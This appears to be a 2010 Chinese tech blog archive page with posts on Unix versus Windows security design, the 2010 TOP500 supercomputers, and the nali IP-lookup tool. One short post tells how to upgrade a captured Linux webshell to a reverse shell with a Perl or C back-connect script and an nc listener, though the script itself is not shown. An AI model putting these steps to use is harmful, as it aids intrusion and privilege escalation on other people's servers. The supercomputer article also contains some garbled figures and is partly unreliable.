Windows最大的不同在于,Unix系统强大的安全性是因为它拥有良好的安全架构设计,不得不承认一个事实,在安全方面双方有很多相同点,而微软似乎更想将Unix的安全特性全部纳入其Windows系统,但微软有一点没有做好的是,其安全性设计都是驾临于操作系统之上,而不是从系统架构出发考虑的。
  例如,Windows中的特权隔离长期以来对Windows安全都有一个问题,在Windows架构层面的确有一些特权隔离特性,但它只是一个半心半意的实现,依赖于用户级功能行为和使用意图。

  系统模块化是Unix架构安全的另一个实例,而这是Windows所缺乏的。每一个Windows版本都捆绑了大量的应用程序,如IE浏览器。即使一次针对浏览器的攻击,也很容易获得内核空间的访问权,从而获得整个系统的控制权,而这种情况在Unix的基础系统中是不存在的。

  特权隔离的重要性

  有人可能会抱怨你想保护的系统信息存放在其他用户也能访问到的位置,因此特权隔离不能起到真正的作用。其实他们没有完全理解特权隔离的好处:可以防止入侵者获得root权限。

  服务器进程通常运行在Unix系统一个特殊用户账户下,这意味着入侵者通过网络入侵得逞后,也只能拿到该服务对应用户账户的权限。大多数情况下这些用户都属于普通用户,大部分恶意软件都需要管理员账户才能正常工作。

  键盘记录器是Windows用户的恶梦,但在Unix系统上,它们需要管理员级的系统组件才能正常运行。这意味着即使键盘记录器通过某些非特权用户账户成功注入到系统,但因没有足够的权限也不能开始它的工作。

  其它安全威胁,如rootkit,木马和僵尸网络客户端也需要Unix系统的root用户权限才能工作。而在Windows系统上,缺乏严格的特权隔离致使其对恶意软件的防护能力不足。

  用户控制和自动执行

  众所周知,Windows很容易感染病毒,主要是因为它想为用户做太多的事情。恶意软件通常会随不相干的软件运行而自动启动,例如,当你打开一个Word文档时,巧妙设计的恶意软件也跟着运行,而这时Windows将重定向文件的执行路径,从Word文件转向恶意软件执行需要的文件。

  相反,Unix系统在默认情况下是不会干这种蠢事的。在Unix上运行程序更规范,要打开的文件将作为一个参数传递给主程序。因此如果恶意软件试图用伪装的OpenOffice.org文档诱骗OO.o执行,操作系统是不会上当的;相反,文字处理软件无法打开该文件,因为它的文件类型不正确。

  在Windows下还有一种无安全保证的自动执行 – 臭名昭著的AutoRun(自动运行)。美国国防部就曾被搞得很窝火,有人用U盘接入国防部电脑,恶意软件利用Windows的AutoRun特性自动运作,继而使它许多安装有Windows的电脑遭到入侵,虽然可以关闭Windows的自动运行功能,但并不是那么容易,这样的功能本身默认就不应该开启,不知为何微软没有意识到这一点,更糟糕的是,即便你关闭了自动运行功能,Windows自动更新也会暗中自动激活它。

  不同的设计理念

  Unix和Windows在安全方面的设计差异体现了不同的理念。遗憾的是,Unix从底层设计开始就将安全考虑进去了,而Windows的理念是“谁在乎安全呢?”。

  但Windows并不孤单,类Unix的系统也正在朝这条路走去,如广为人知的Linux,拿现在最流行的Ubuntu为例吧,它在安全和受欢迎方面的平衡也如Windows一样,Ubuntu更注重用户体验,安全似乎不是它最关心的,但始终流淌着Unix系统安全设计的血液,可悲的是,它们之间的差距可能会随时间而越来越小。

十月 27th, 2010

Posted In: 未分类

常会有一些朋友拿到一些webshell,但是是linux权限,如何提权了,最好还是利用返弹shell然后nc 临听
以下为perl和C的反弹脚本,如果是webshell推荐使用perl脚本
使用方法
1 perl可保存为pl文件,然后使用x.pl IP port,使如你要反弹到192.168.1.8这台服务器或是PC上
x.pl 192.168.1.8 12666,在你本机下开NC监听即可,linux平台也是同样临听12666端口即可

2 C代码的使用方法
新建一个.c的文件把代码复制进去,然后用gcc编译
gcc -o voilet voilet.c -static
然后运行./voilet ip 端口即可启动监听

点击下载此文件

十月 25th, 2010

Posted In: linux系统

2010年全球高性能计算机TOP500排行榜在今年6月份公布了,今年的三甲分别是Jaguar、曙光星云和Roadrunner。今年让国人特别激动的是曙光的”星云”挤入第二名。可以注意到的是,这前三款超级计算机使用的都是Linux操作系统,那么究竟2010年的前三名超级计算机是什么样的呢?一起来看看吧。

根据TOP500资料显示,目前全球500强超级计算机有282部在美国,114部在欧洲(其中英国拥有38部,法国拥有29部,德国拥有24部),24部在中国,18部在日本,5部在印度。从整个操作系统占有比例上可以看出,Linux几乎独占了HPC超级计算领域。至2010年6月为止的数据显示,Linux所占的比例达91%。

颠峰对决:全球最牛3款Linux超级计算机

▲2010年全球500强超级计算机分布图

颠峰对决:全球最牛3款Linux超级计算机

▲2010年6月全球高性能计算机TOP500操作系统家族排行版

颠峰对决:全球最牛3款Linux超级计算机

▲2009年6月全球高性能计算机TOP500操作系统家族排行版

第一名:Cray的美洲豹”Jaguar”

位列2010年高性能计算机Top 500第一名的超级计算机仍然是去年Top 500 12月份的冠军–来自Cray的美洲豹”Jaguar”,凭借1.759PFlop/s(每秒1759万亿次)的计算能力傲视群雄。从官方公布的数字来看,”Jaguar”采用了224162个处理器核心。该款超级计算机位于美国田纳西州橡树岭国家实验室,主要用于武器模拟。Jaguar使用的操作系统是UNICOS/lc,这是结合Linux服务节点和Catamount微核计算节点的系统。

颠峰对决:全球最牛3款Linux超级计算机

颠峰对决:全球最牛3款Linux超级计算机

▲图:美国强超级计算机Jaguar

Jaguar(美洲豹)是一台结合XT3和XT4系统Cray XT系统。是美国国家领导的主要计算设备(NLCF)。

目前Jaguar装有11706个处理器节点,其中,有11508个是计算机配置节点,主要提供I/O和登录服务。而且每个计算节点包含2.6GHz的双核AMD皓龙处理器和8GB的内存。该服务器节点包含2.6 GHz双核ARM皓龙处理器和8GB内存。整个系统提供超过119万亿次的浮点运算和大约46万亿字节的内存总量峰值性能。此外,该系统为其文件系统提供约600个缓存磁盘空间。

Jaguar系统中的每个节点是通过 Hypertransport技术连接到Cray Seastar路由器中,而Seastars路由使用的是一个三维环面的拓扑互联结构。这种拓扑结构具有高带宽、低延迟、可扩展性强等特点。

Jaguar速度是1750万亿次,普通的计算机要花费多久时间来完成这个计算呢 ?

颠峰对决:全球最牛3款Linux超级计算机

上图给了一个很直观的演示,Jaguar运行1秒钟,普通PC需要运行10小时 (相当于从伦敦坐飞机到墨西哥的时间)。Jaguar运行1分钟,普通PC需要运行25天(相当于从约翰欧格罗斯步行到加拿大兰兹角所花的时间)。Jaguar运行1小时,普通PC需要运行4年(这个相当于两届世界杯间隔时间)。Jaguar运行1天,普通PC需要运行100年(100年的时间都可能收到女皇的电报了)。

第二名:曙光”星云”超级计算机

2010年全球高性能计算机TOP500排行榜上中国有两台进入前十名,居世界超级电脑500强第二位的是曙光”星云”,位于深圳国家超级计算机中心,运算速度1270万亿次。而位列第七的是”天河一号”。这样的好成绩标志着我国生产、应用、维护高性能计算机的能力已达到世界领先水平,对中国高性能计算机的发展具有划时代的意义。

“星云”是由TC3600系列计算刀片搭建、使用了英特尔至强5650处理器和Nvidia Telsa的超级计算机,它是目前为止中国超级计算机在Top500榜单上的最高名次的高性能计算机。

“星云”是目前中国实测性能超过一千多万亿次的首台商用高性能计算机,其峰值运算速度可达每秒3000万亿次,实测Linpack性能达到每秒1271万亿次。除了超强计算能力,它还拥有超高密度、超高性价比、超低功耗以及超广泛应用等特点。该款计算机采用的也是Linux操作系统。

颠峰对决:全球最牛3款Linux超级计算机

▲曙光”星云”超级计算机

曙光公司成立于1995年,实现了国产高性能计算机的产业化生产,构建了集研发、设计、制造于一体的服务器产业链。2008年,该公司推出了我国首款百万亿次超级计算机曙光5000A,并在当年发布的全球高性能计算机TOP500排行榜上跻身世界超级计算机第十位。

第三名:IBM “Roadrunner”超级计算机

排名第三的是IBM的”Roadrunner “走鹃超级计算机,目前位于美国新墨西哥国家实验室。主要用于实验研究工作。Roadrunner使用操作系统还是开源Linux操作系统–Red Hat。Roadrunner将主要用于确保国家核武器储备的安全问题。此外,它还用于天文,能源,人类基因组科学和气候变化的研究。

颠峰对决:全球最牛3款Linux超级计算机

颠峰对决:全球最牛3款Linux超级计算机

▲IBM的”Roadrunner “走鹃超级计算机

2006年,美国能源部国家安全管理局选定洛斯阿拉莫斯国家实验室作为IBM超级计算机Roadrunner的研发实验基地。Roadrunner(走鹃)是以新墨西哥的州鸟的名字命名的,花费了大约1亿美元的成本。Roadrunner经过三个阶段的研究才完成得,它是世界上第一个”混合”超级计算机。每秒钟可以完成一千万亿次计算。Roadrunner的速度是IBM位于劳伦斯利弗莫尔国家实验室的Blue Gene system中运行最快计算机的2倍。

Roadrunner是世界上第一台混合超级计算机。其早期设计主要使用Cell宽带引擎® ,最初主要是为索尼Playstation 3 ® 这类视频游戏平台而设计的,主要结合X86处理器和AMD®。

据统计,Roadrunner连接了6562个双核ARM Opteron ®芯片和12,240个Cell芯片,它是基于IBM QS22刀片服务器模型。Roadrunner计算机系统有98万亿字节的内存,并存放在一个278个冰箱大小的机柜中,而IBM BladeCenter®大约要占领5200平方米英尺的空间,总共有1万个节点,其全部无线带宽和千兆以太网共需要55英里的光纤电缆。Roadrunner重达500000英镑。参与到Roadrunner项目中的公司和技术包括:Emcore(安科), Flextronics(伟创力), Mellanox and Voltaire。

Roadrunner有一个特别的”三刃”配置,是由两个IBM QS22刀片服务器和一台IBM LS21刀片服务器合并而成的,每个三刃每秒钟就可以运行400亿次计算。而且整个机器就包含有3060个”三刃”配置,这些全部都是由IBM罗彻斯特工厂生产的。

这台机器的构建和测试都是在IBM纽约的Poughkeepsie工厂,这里是1990年美国政府创立ASCII系列超级计算机的基地。

与很多传统的超级计算机相比,Roadrunner的混合设计方式具有较小的能源(2.34兆瓦)和世界领先的效率–每瓦4.37亿次计算。IBM认为Roadrunner绝对可以冠上”绿色的超级计算机”的名号。

IBM目前也正在为Roadrunner研究新的软件,Roadrunner的一个重要目标就是让其混合超级计算能力服务于商业应用。通过和企业和学术伙伴合作,开发一个开源的生态系统,为金融计算、能源勘探和医疗成像等提供重要服务。

十月 23rd, 2010

Posted In: 未分类

经常查看日志是否想在查看日志的同时显示其IP所在地了,以下方法就为你提供了方法
自带的命令有
nali
nali-dig
nali-nslookup
nali-traceroute
nali-tracepath
nali-ping
除以上几种方式以外,您可以自己使用shell来组合使用,下面是安装方法和shell截取字符串后对比显示的语句,可自由变更

wget http://qqwry.googlecode.com/files/nali-0.2.tar.gz
tar zxvf nali-0.2.tar.gz
cd nali-0.2
./configure && make && make install
cat /data/log/access.log | awk '{print $1}'|sort|uniq -c|nali|sort -rnk1|more

十月 20th, 2010

Posted In: 未分类

无觅相关文章插件,快速提升流量